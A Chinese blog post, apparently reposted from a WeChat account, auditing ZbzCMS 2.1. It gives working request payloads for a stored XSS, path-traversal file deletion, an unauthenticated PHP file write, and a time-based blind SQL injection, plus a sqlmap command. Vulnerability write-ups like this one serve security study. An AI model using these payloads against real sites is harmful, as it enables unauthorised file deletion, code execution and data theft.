ZbzCMS 2.1代码审计

admin 2023年7月19日17:52:48评论52 views字数 1142阅读3分48秒阅读模式
  • ZbzCMS 2.1代码审计
  • 漏洞复现
  • 漏洞复现
  • 漏洞复现
  • 漏洞复现
  • 存储型XSS
  • 前台任意文件删除
  • 前台未授权RCE
  • 前台Mysql盲注

ZbzCMS 2.1代码审计

源码下载: https://pan.baidu.com/s/1DOFYZKdTAlpPiZ-MwEVXFw

存储型XSS

定位到一处存储XSS:
/cms/common/php/ajax.phpZbzCMS 2.1代码审计

漏洞复现

/cms/common/php/ajax.php?run=liuyan处抓包
构建payload:


  1. POST传入:
  2. diaoyongbiaoqian=hacker&neirong=<script>alert("what the hack")</script>&leixing=1.1.1.1

ZbzCMS 2.1代码审计
后台查看XSS是否生效ZbzCMS 2.1代码审计

前台任意文件删除

定位到一处可能存在文件删除的漏洞
/cms/cms/include/up.phpZbzCMS 2.1代码审计

在删除文件的操作中没有进行权限的识别ZbzCMS 2.1代码审计

漏洞复现

测试删除hellword.txt文件ZbzCMS 2.1代码审计
/cms/cms/include/up.php?run=del处抓包
构造payload:


  1. POST传入
  2. url=../../../helloword.txt

ZbzCMS 2.1代码审计

放包后可以看到helloword.txt已经被删除ZbzCMS 2.1代码审计

前台未授权RCE

/cms/cms/admin/run_ajax.php 第461-470行
存在文件编辑保存操作ZbzCMS 2.1代码审计

漏洞复现

传入Path neirong参数即可构成任意文件读写/创建操作
Payload:(在根目录写入一个hello.php文件):


  1. POST /cms/cms/admin/run_ajax.php?run=wenjian_edit HTTP/1.1
  2. path=../../../hello.php&neirong=<?php phpinfo();?>

/cms/cms/admin/run_ajax.php?run=wenjian_edit处抓包ZbzCMS 2.1代码审计
放包后可以看到生成了hello.php文件ZbzCMS 2.1代码审计

访问hello.php成功ZbzCMS 2.1代码审计

前台Mysql盲注

对代码进行复审,发现 /cms/common/php/ajax.php 存在SQL注入ZbzCMS 2.1代码审计

漏洞复现

payload:
(这里是直接使用了sqlmap的payload)

run=ad&id=3 AND (SELECT 3437 FROM (SELECT(SLEEP(5)))QQHn)

ZbzCMS 2.1代码审计

使用sqlmap

python sqlmap.py -u "http://x.x.x.x//cms/common/php/ajax.php?run=ad&id=3" -p id

ZbzCMS 2.1代码审计

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

ZbzCMS 2.1代码审计

原文始发于微信公众号(掌控安全EDU):ZbzCMS 2.1代码审计

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月19日17:52:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ZbzCMS 2.1代码审计http://cn-sec.com/archives/1890031.html

发表评论

匿名网友 填写信息